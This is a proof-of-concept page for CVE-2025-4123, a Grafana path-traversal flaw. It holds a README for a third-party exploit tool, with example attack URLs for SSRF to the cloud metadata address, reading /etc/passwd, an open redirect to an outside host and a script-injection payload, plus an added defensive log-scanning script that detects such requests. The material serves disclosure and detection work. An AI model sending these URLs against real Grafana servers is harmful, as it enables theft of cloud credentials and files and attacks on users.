
CVE-2025-4123 PoC — Grafana Security Vulnerability

Associated Vulnerability
Title: Grafana Security Vulnerability (CVE-2025-4123)
Description: A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF. The default Content-Security-Policy (CSP) in Grafana will block the XSS through the `connect-src` directive.
Description: CVE-2025-4123 - Grafana Tool
Readme

# CVE-2025-4123 - Grafana Path Traversal Exploit

> Developed by **mitsec**

This is a proof-of-concept (PoC) exploit tool for **CVE-2025-4123**, a critical path traversal vulnerability in Grafana's `/public` endpoint. The exploit allows for:

- ✅ Server-Side Request Forgery (SSRF)
- ✅ Local File Inclusion (LFI)
- ✅ Open Redirect
- ✅ Cross-Site Scripting (XSS)

## 🔥 Affected

Grafana instances whose `/public/` endpoint improperly handles encoded paths such as:
```
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
```

---

## 🚀 Usage

```bash
python3 cve_2025_4123_exploit_mitsec_final.py
```

Then select the desired mode:

1. SSRF - Internal services like `169.254.169.254`
2. LFI  - Read files like `/etc/passwd`
3. Open Redirect - Redirect to external domains
4. XSS - JavaScript injection in public path

---

## 🧪 Example

```text
[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
```
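As an added defensive example (not part of the mitsec tool or of Grafana itself), the following scans web-server access-log lines for the encoded `..` and backslash pattern the URLs above use under `/public/`. The log lines are constructed for illustration, and the check decodes repeatedly so double-encoded variants are also caught.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic); only the request path is inspected.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2025:10:00:01 +0000] "GET /public/build/grafana.dark.css HTTP/1.1" 200 1234
10.0.0.6 - - [01/Jun/2025:10:00:02 +0000] "GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/1.1" 302 0
10.0.0.7 - - [01/Jun/2025:10:00:03 +0000] "GET /public/..%252F%255c169.254.169.254/latest/meta-data/%2F%3f%2F..%2F.. HTTP/1.1" 302 0
10.0.0.8 - - [01/Jun/2025:10:00:04 +0000] "GET /api/dashboards/home HTTP/1.1" 200 567
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def normalize_path(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable (bounded, to cover double encoding) and fold '\\' into '/'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def is_public_traversal(path: str) -> bool:
    """True when a request under /public/ contains a '..' path segment after normalization."""
    norm = normalize_path(path)
    if not norm.lower().startswith("/public/"):
        return False
    return ".." in norm.split("/")


def scan_log(text: str) -> list[tuple[str, str]]:
    """Return (client_ip, raw_request_path) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        raw_path = match.group(1)
        if is_public_traversal(raw_path):
            hits.append((line.split()[0], raw_path))
    return hits


if __name__ == "__main__":
    for ip, path in scan_log(SAMPLE_LOG):
        print(f"[!] {ip} requested traversal under /public/: {path}")
```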

---

## 📄 Disclaimer

This code is provided for educational and authorized testing purposes only. Unauthorized use against systems without consent is illegal.

---

## ✍️ Author

- [mitsec](https://github.com/ynsmroztas)
File Snapshot

```text
[4.0K] /data/pocs/39fe7a34d6c48fd2bf548dd5cea1e20676075445
├── [2.8K] cve_2025_4123_exploit-mitsec.py
├── [274K] Grafana.jpg
└── [1.3K] README.md

0 directories, 3 files
```